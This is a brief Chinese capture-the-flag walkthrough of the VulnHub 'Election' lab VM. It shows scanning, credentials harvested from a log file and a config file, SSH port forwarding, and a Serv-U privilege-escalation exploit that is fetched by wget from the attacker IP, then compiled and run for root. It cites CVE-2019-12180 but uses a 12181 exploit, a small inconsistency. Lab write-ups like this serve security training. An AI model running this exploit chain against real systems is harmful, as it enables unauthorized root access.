下载地址:https://download.vulnhub.com/election/election.7z
攻击者IP:192.168.56.132 桥接(自动) vmare
受害者IP:192.168.56.156 仅主机 vxbox
端口扫描
web是apache默认页面,源代码没有藏东西
目录扫描
phpmyadmin弱口令进不去
提示了4个目录,election是可以访问的
这是一个投票系统,似乎没有可以利用的点
继续扫描目录
ssh成功登录
love/P@$$w0rd@123
【2020-01-01 00:00:00】 为用户 love 分配了密码:P@$$w0rd@123【2020-04-03 00:13:53】 Love 添加了候选者 'Love'[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
Desktop文件发现用户的flag
配置文件中发现数据库的账号密码
newuser/password
数据库中发现love的编号和密码
1234/Zxc123!@#
我想这个密码除了能登陆仪表板之外还有其他作用
netstat -nltp
查看端口,发现43958和631有点东西
端口转发
讲love的43958和631端口转发到kali上
ssh [email protected] -L 43958:localhost:43958 -L 631:localhost:631
转发后的页面
Serv-U是Windows平台和Linux平台的安全FTP服务器(FTPS,SFTP,HTTPS),是一个优秀的,安全的文件管理,文件传输和文件共享的解决方案。同时也是应用最广泛的FTP服务器软件。
试了下账号密码都登陆不进去。搜素公开的nday,
版本号是15.1.6
很快就能发现cve-2019-12180可以提权
下载exp
git clone https://github.com/mavlevin/CVE-2019-12181
cd CVE-2019-12181
cp servu-pe-cve-2019-12181.c /var/www/html
至此,获得root权限
wget 192.168.56.132/servu-pe-cve-2019-12181.c
gcc servu-pe-cve-2019-12181.c -o exp666
chmod +x exp666
./exp666
原文始发于微信公众号(王之暴龙战神):election
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论